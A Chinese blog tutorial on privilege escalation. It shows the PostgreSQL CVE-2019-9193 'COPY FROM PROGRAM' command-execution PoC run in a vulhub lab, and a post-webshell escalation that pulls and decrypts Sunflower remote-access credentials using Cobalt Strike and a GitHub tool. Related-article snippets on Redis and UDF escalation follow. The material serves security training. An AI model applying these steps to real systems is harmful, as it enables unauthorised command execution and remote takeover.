权限提升-PostgreSQL数据库提权+第三方应用提权

最新推荐文章于 2024-04-28 16:11:59 发布
最新推荐文章于 2024-04-28 16:11:59 发布
阅读量662 收藏 3
点赞数 1
分类专栏: 权限提升 文章标签: 数据库 postgresql oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/132577698
版权

权限提升基础信息

1、具体有哪些权限需要我们了解掌握的?

后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等

2、以上常见权限获取方法简要归类说明?

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入

网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell

数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入

接口权限:SQL注入,数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入

系统权限:高危系统漏洞直达或网站权限提升转入、数据库权限提升转入,第三方转入等

域控权限:高危系统漏洞直达或内网横向渗透转入,域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?

后台权限:

常规WEB界面文章分类等操作,后台功能可操作类

网站权限:

查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。

数据库权限:

操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。

接口权限:

后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),具体可以操作的事情大家自己想想。

系统权限:如同在你自己操作自己的电脑一样

域控权限:如同在你自己操作自己的虚拟机一样

 

案例:数据库-PostgreSQL数据库权限提升-漏洞

提权利用的是漏洞:CVE-2019-9193 

介绍:

         PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,需要管理员或具有“COPY TO/FROM PROGRAM”权限的用户,就能使用这个特性执行任意命令。

演示开始

1.启动vulhub靶场 PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)环境

2.根据环境给到的数据库账号密码:postgres/postgres ,端口:5432  使用Navicat连接

3.连接成功后点击新建查询,执行漏洞POC:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM '命令';
SELECT * FROM cmd_exec;

成功执行命令:

案例:第三方应用提权-向日葵

前提条件:已有webshell权限

1.利用探针(查看端口,进程等)知道服务器安装了向日葵服务

执行:tasklist /svc

2.开启提权工具-CS

3.利用CS插件上传向日葵提权工具

4.上传

5.执行

6.机器密文就是验证码,使用Python高版本(大于3.8)执行解谜脚本Sunflower_get_Password进行解密。

下载:https://github.com/wafinfo/Sunflower_get_Password

接下来可以使用向日葵远控软件直接连接。

xiaoheizi安全
关注
专栏目录
权限提升数据库——Redis和PostgreSQL提权方式
m0_61506558的博客
10-17 732
通过之前对Access、MSSQL(SQL server)和Mysql注入的介绍,大家对数据库提权方式有了一定的认知,我认为耗时间的是Access,这和它开发的理念有直接的关系,而本次介绍的是Redis和PostgreSQL提权,和之前提权利用的点很相似,会利用到系统自带独特的方式,主要集中在配置文件发生问题,进行反弹连接,进行渗透。权限提权——Win提权漏洞及数据库&AT&SC&PS提权__Cyber的博客-CSDN博客。
PostgreSQL数据库提权
最新发布
m0_64481831的博客
05-28 884
postgreSQL是一个功能强大对象关系数据库管理系统。
PostgreSQL 数据库提权的几种方法——提权教程
W小哥
12-02 3103
一、漏洞描述 二、漏洞原理 三、环境搭建 四、漏洞复现 五、漏洞修复
权限提升-MSSQL&PostgreSQL
m0_65336233的博客
12-06 750
数据权限提升知识
第22篇:一次艰难的PostgreSQL不出网提权过程
ABC_123的博客
09-15 1184
Part1 前言在日常的内网横向过程中,对于SMB、Mysql、SSH、Sqlserver、Oracle等服务的弱口令爆破是常用手段,重复的红队攻防比赛使得这些服务的弱口令越来越少了。所以在平时,ABC_123也会关注一些其它服务的弱口令提权方法,有时候会在内网横向中收到奇效。本期就分享一个在内网渗透中,遇到的PostgreSQL数据库提权案例,过程非常艰辛,但是收获不少。首先简单介绍一下当时...
短视频去水印小程序源码修复版-前端后端内置接口+第三方接口.zip
01-15
该压缩包文件“短视频去水印小程序源码修复版-前端后端内置接口+第三方接口.zip”包含了开发一款短视频去水印小程序所需的全部源代码,包括前端和后端的修复版,以及内置接口和第三方接口的实现。接下来,我们将详细...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4371
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
PostgreSQL数据库
11-20
众多第三方项目和商业公司围绕PostgreSQL构建解决方案,如云服务提供商的数据库托管服务、数据分析工具等。 总结,PostgreSQL作为一款强大的开源数据库,不仅满足基本的RDBMS需求,还在并发控制、数据类型、安全性...
SQL_user.zip_第三方数据库
09-21
第三方数据库通常指的是非主流或非原生的数据库解决方案,如MySQL、PostgreSQL、MongoDB等,它们与Oracle、Microsoft SQL Server等传统数据库系统相对。 在数据库领域,选择第三方数据库可能出于几个原因:成本效益...
PostgreSQL 提权漏洞(CVE-2018-1058)
EC_Carrot的博客
07-21 827
漏洞简介 PostgreSQLPostgreSQL开发组所研发的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3版本至10版本中存在安全漏洞。攻击者可利用该漏洞以超级用户的权限执行代码。 参考文章:https://vulhub.org/#/environments/postgres/CVE-2018-1058/ 漏洞复现 我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --ho
postgresql 分割_三分钟解析postgresql提权
weixin_35953704的博客
01-13 298
本头条号所分享文章仅供学习交流,请勿非法使用!近期遇到一些关于提权的问题,和大家分享一下~创建环境介绍docker中有一个COPY命令;COPY 在 PostgreSQL表和标准文件系统文件之间交换数据,该参数指示 PostgreSQL 服务器直接从文件中读写数据 COPY TO 把一个表的所有内容都拷贝到一个文件 COPY FROM 从一个文件里拷贝数据到一个表里(把数据附加到表中已经存在的内容...
攻防演练作为红方:postgresql提权之UDF提权 ,及其好用的工具
keyboard专栏
04-28 867
PostgreSQL 中,用户定义的函数(UDF)提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
提权 - Redis/Postgre数据库
acepanhuan的博客
03-01 624
提权 - Redis/Postgre数据库
权限提升】61 Redis Postgresql数据库提权
(∪.∪ )...zzz的博客
08-04 462
目录redis数据库权限提升Redis未授权访问漏洞利用1. 利用计划任务执行命令反弹shell2. 写ssh-keygen公钥后 使用私钥登录3. 往web路径写webshell修复方案-漏洞成因PostgreSQL数据库提权建立连接、漏洞利用,提权Windows2008& 7 令牌窃取提升-本地Windows2003& 10 进程注入 redis数据库权限提升 redis非关系式,分布式 redis服务因配置不当,可被攻击者恶意利用 黑客借助redis内置命令,可将现有数据恶意清空
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1250
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞:CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
数据库提权
weixin_71169068的博客
04-16 899
利用此方法第一步先判断版本和安装路径:1.mysql5.1 则 导出dll文件到安装目录 /lib/plugin(这个目录默认是没有的,需要我们去创建)查看版本:mysql=>5.1跳转到安装目录发现lib目录下没有plugin,这里需要我们新建目录点击mysql提权,设置好路径,安装DLL执行命令,从而提权
mysql udf提权_三分钟解析postgresql提权
weixin_39730911的博客
12-05 444
本头条号所分享文章仅供学习交流,请勿非法使用!近期遇到一些关于提权的问题,和大家分享一下~创建环境介绍docker中有一个COPY命令;COPY 在 PostgreSQL表和标准文件系统文件之间交换数据,该参数指示 PostgreSQL 服务器直接从文件中读写数据 COPY TO 把一个表的所有内容都拷贝到一个文件 COPY FROM 从一个文件里拷贝数据到一个表里(把数据附加到表中已经存在的内容...
权限提升-系统权限提升篇&数据库提权&Postsql&Redis&第三方软件提权&密码凭据&钓鱼文件
siu~
03-24 1500
1、数据库到Linux-数据库提权-Redis 3、数据库到Linux-数据库提权-PostgreSQL 4、计算机用户到系统-第三方软件-各类应用 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值